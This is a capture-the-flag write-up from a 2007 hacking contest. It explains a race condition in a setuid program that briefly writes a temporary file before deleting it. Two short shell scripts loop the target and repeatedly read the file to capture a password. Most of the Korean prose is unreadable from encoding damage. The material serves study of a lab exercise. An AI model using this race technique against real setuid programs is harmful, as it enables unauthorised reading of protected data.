--------------------------------
6th HUST hacking festival
  race condition report

hkpco
hkpco@korea.com
wowhacker&wowcode
--------------------------------


HUST2007 hacking festival ̽   Դϴ.

۾ ϵ  α  ʾ  ֱ   ϴ.

켱 ÷ Ͽ setuid ɸ α׷ ãϴ.

츮 ؾ   α׷ /bin/flyHigh  ǰڽϴ.

 α׷ strings   (openԼ),  (write), (unlink)ϴ  ƾ մϴ.

ϴ  ̸ /quest/level5/tmp/HUST ̸   Ǵ ª    õ

Ͽ б  Ƿ ׷ մϴ.

츮 ⼭ /quest/level5/tmp/HUST  , ,  Ǵ ª  ð ̿Ͽ race condition    ֽϴ.

/bin/flyHigh Ͽ , /quest/level5/tmp/HUST  ̹ ϸ    ʴ°   ֽϴ.

̸ ̿ϸ "ٸ   Ǵ б  " ƴ "  б  "  ǰ ˴ϴ.

 ϵǴ  ٷ   ϰ̸ ̰ о մϴ.

 ٷ unlink() ǹǷ  ϵǰ Ǵ  ð ̿մϴ.

 Ÿ  Ʒ ϴ.

|write()|.. ª ð..|unlink()|

 ͹̳ο /bin/flyHigh , ٸ  ͹̳ο /quest/level5/tmp/HUST  б۾  ϸ ɰԴϴ.

׷  gcc cat ɾ  Ƿ  ũƮ headɾ üմϴ.

ۼ  ũƮ Ʒ ϴ.

- loop_target.sh -

#!/bin/sh

for((;;))
do
	/bin/flyHigh
done

- end -

loop_target.sh  /bin/flyHigh  Ű  ũƮԴϴ.

Ʒ race_rush.sh ۾ ˾ƺڽϴ.

- race_rush.sh -

#!/bin/sh

for((;;))
do
	echo "hkpco" >> /quest/level5/tmp/HUST;head /quest/level5/tmp/HUST;head /quest/level5/tmp/HUST;usleep 10000
done

- end -

"hkpco"   /quest/level5/tmp/HUST  ϰ headɾ /quest/level5/tmp/HUST  оݴϴ.

/bin/flyHigh ð Ͽ head    ݴϴ.

 ۾  ݺǱ  ĩ  ͹̳λ µȴٰ Ͽ Ⱑ    ֽϴ.

׷ usleep ̿ؼ ݺǴ ۾ ̸ ݴϴ.

ش  chmod ۹̼ Ƿ "/bin/sh ũƮ.sh"   ũƮ ŵϴ.

   մϴ.

[terminal 1]
$ sh loop_target.sh

[terminal 2]
$ sh race_rush.sh

[terminal 2]  ٸ "PracTicE mAkeS PerFeCtsibar"   µ˴ϴ.